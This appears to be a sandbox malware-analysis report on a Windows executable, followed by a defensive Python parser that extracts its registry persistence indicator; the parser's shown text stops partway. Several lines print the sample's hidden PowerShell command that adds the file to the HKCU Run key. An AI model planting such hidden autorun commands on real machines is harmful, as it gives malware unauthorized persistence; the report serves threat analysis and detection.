    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2227
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 960
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1430
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 485
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe API coverage: 0.0 %
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe API coverage: 0.0 %
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe API coverage: 0.0 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024 Thread sleep count: 2227 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024 Thread sleep count: 960 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8044 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep count: 1430 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep count: 485 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2316 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: lDO4WBEQyL.exe, 00000000.00000002.3891639613.000000000082E000.00000004.00000020.00020000.00000000.sdmp, lDO4WBEQyL.exe, 00000006.00000002.3893083631.000000000254A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\ldo4wbeqyl.exe\" }"
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\lDO4WBEQyL.exeCode function: 0_2_00FB6C50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB6C50
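The Process created entries above, together with the two Autostart events later in the report, show the sample's only persistence mechanism: a hidden powershell.exe that writes an HKCU Run value named App pointing back at the sample's own path. The parser below is an added example written for this page; it is neither Joe Sandbox code nor the malware author's. It pulls the key, value name and target out of such a line so the autorun IOC can be fed to a hunt, and flags two things a triager would note: the target lives in a user-writable location, and the -Not (Test-Path ...Run\App) guard tests for a registry key named App (Test-Path on the Registry provider only sees keys, never values), so it never short-circuits and the value is rewritten on every start, which matches the repeated Autostart entries. REPORT_LINE is copied from the report; the field names and heuristics are the author's own assumptions.

```python
"""Pull Run-key persistence details out of a Joe Sandbox "Process created" line.

Added example for this report page; not Joe Sandbox code and not the sample's code.
REPORT_LINE is copied from the report; field names and heuristics are the author's.
"""
import re

# Copied from the report's behaviour listing (the original-case variant).
REPORT_LINE = (
    r'Source: C:\Users\user\Desktop\lDO4WBEQyL.exe Process created: '
    r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden '
    r'-Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) '
    r'{ Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" '
    r'-Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }"'
)

HIVES = {"HKCU:": "HKEY_CURRENT_USER", "HKLM:": "HKEY_LOCAL_MACHINE"}
# Directories an unprivileged user can write to; an autorun target under one of
# these is the classic "drop and persist" shape (author's heuristic list).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# The -Command payload sits inside the outer quotes; inner quotes are escaped as \".
_CMD = re.compile(r'\bpowershell\b.*?-Command\s+"(?P<body>.*)"', re.I | re.S)
_SET = re.compile(
    r'Set-ItemProperty\s+-Path\s+\\"(?P<path>[^"]*)\\"\s+'
    r'-Name\s+\\"(?P<name>[^"]*)\\"\s+-Value\s+\\"(?P<value>[^"]*)\\"',
    re.I,
)
_GUARD = re.compile(r'Test-Path\s+\\"(?P<target>[^"]*)\\"', re.I)


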